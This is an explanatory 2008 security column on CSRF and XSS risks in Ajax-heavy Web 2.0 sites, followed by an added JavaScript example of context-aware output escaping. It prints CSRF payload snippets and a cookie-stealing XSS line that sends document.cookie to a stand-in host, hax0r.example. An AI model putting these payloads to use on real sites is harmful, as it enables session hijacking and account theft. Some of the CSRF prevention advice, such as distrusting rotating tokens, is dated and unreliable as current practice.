
Web 2 ... Oh ... Security?

April 25, 2008
By Jimmy Ray Purser


Of course, your friendly neighborhood hacker sees this as an opportunity for a cross-site request forgery attack. It's kind of like Address Resolution Protocol (ARP) spoofing for URLs. We use lots of Ajax in Web 2.0 apps to speed up the browser load time because it can make a bunch of little HTTP GETs to update only a small piece of a page instead of the entire app. Now, because of the same origin policy, many code jockeys believe that since XMLHttpRequest (XHR) will only speak to the origin page they are safe. That's kind of like going fishing with a can of corn, because fish like corn, you can put corn on a hook, so ... This works by a hacker embedding malicious HTML or JavaScript code into an e-mail or Web site to request a specific "task URL," which executes without the user's knowledge, either directly or by utilizing a cross-site scripting (XSS) flaw. It would look like this:

IFRAME SRC:

    <iframe src="http://host/?command"></iframe>

JavaScript 'Image' object:

    <script> var twtv = new Image(); twtv.src = "http://host/?command"; </script>

Preventing this attack is not as tough as getting in-laws to leave before supper time; you just have to plan. First, make sure your site is not vulnerable to XSS attacks. If a single XSS flaw exists, then there is no good way to prevent a Cross-Site Request Forgery (CSRF) issue from being exploited. This is truly job one for us people going to Web 2.0: your site must be free from XSS (Cross-Site Scripting) issues. Also, configuring a short timeout period for user sessions is as important as choosing the right fishing bait. If your site requires the user to be logged in before performing an action, setting the user's session to a short session period (three minutes should work) will reduce the odds of a successful CSRF attack. I also recommend that you prompt the user with a login page and/or a strong Captcha (Completely Automated Public Turing test to tell Computers and Humans Apart) each time an important site action is performed. You may read about things like rotating tokens that sound good; my concern with this is that a single browser vulnerability can allow a hacker to snag your session token, and then it's game over.

The final issue, but certainly not the least, is XSS. I mentioned this earlier, but let's take a look at what it is and what to do about it. Basically, a hacker forces a Web site to echo evil executable code, which loads in a user's browser. The majority of this code is in HTML/JavaScript, but I have also seen it in ActiveX and Flash. Basically, whatever the browser supports can lend itself to a code vector. If a hacker can get a user's browser to execute the code, it will run within the security context of the hosting Web site. Because of this level of privilege, the code has the ability to read, modify, and transmit any data the browser can access. Hacked, or really hijacked, users can have their account stolen by stealing the cookies (remember all the "click here to remember me" login buttons), redirecting the browser to show fake content, and so on. I would steal cookies with a small piece of code like this:

    <SCRIPT> document.location = 'http://hax0r.example/cgi-bin/cookiesteal.cgi?' + document.cookie </SCRIPT>

I would never get you to run this code, but if you add some marketing knowledge and change the packaging you get this:

http://tinyurl.com/2enk

I love Twitter (come over and follow me!). I get tinyurl requests all the time because the letter space follows Short Message Service (SMS) rules: 168 characters. I never send them or open them. I strongly recommend that you don't either. They are excellent ways to hide XSS attacks. Preventing XSS can be done by removing strings or characters, but that can be tricky because many apps use different characters for different things. Personally, I like escaping user-supplied data within Web, Ajax, and similar calls. I know this is a real pain because we have to escape with URL/JavaScript or HTML entity encoding, depending on where the data lands.
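To make the escaping advice concrete, here is an added example (not code from the original column) of context-aware output encoding in JavaScript: one encoder each for HTML text, JavaScript string literals, and URL query parameters, applied to the cookie-stealing payload shown above. The function names and the sample "display name" input are constructed for this example.

```javascript
// Added example: escape user-supplied data for the context it is inserted
// into. A single "strip bad characters" filter cannot cover all three
// contexts, which is why the column says you must escape with URL,
// JavaScript, or HTML entity encoding.

// Escape for insertion into HTML text or a quoted HTML attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;',
                '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Escape for insertion inside a JavaScript string literal. Everything except
// letters, digits and spaces becomes \xHH (or \uHHHH above 0xFF), so neither a
// quote nor "</script>" can terminate the literal or the script block.
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 ]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 256
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Escape for use as one URL query-parameter value.
function escapeUrlParam(s) {
  return encodeURIComponent(String(s));
}

// Constructed sample input: the column's cookie-stealing payload supplied as
// a user's display name.
const untrustedName =
  "<SCRIPT>document.location='http://hax0r.example/cgi-bin/cookiesteal.cgi?'+document.cookie</SCRIPT>";

// Render the untrusted value into all three contexts of a page fragment.
// Hypothetical template; each slot uses the encoder for its own context.
function renderProfile(name) {
  return [
    '<p>Hello, ' + escapeHtml(name) + '</p>',
    "<script>var displayName = '" + escapeJsString(name) + "';</script>",
    '<a href="/search?q=' + escapeUrlParam(name) + '">search</a>',
  ].join('\n');
}

// True when the payload's own tag (upper-case, as injected) survived intact.
function payloadSurvived(html) {
  return html.indexOf('<SCRIPT') !== -1;
}
```

Note that `encodeURIComponent` leaves `'` and `(` `)` unencoded, so a URL-encoded value still must not be dropped into an HTML or JavaScript context without that context's own encoder.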

Web 2.0 is cool and here to stay. No need to freak out about it. It's the same old story: To keep the Internet in balance, good stuff exploited by bad stuff, fixed by good stuff, it's a whole circle-of-life kind of situation. ... I feel like breaking out in a song ...



Jimmy Ray Purser is a networking and network security expert at Cisco Systems.

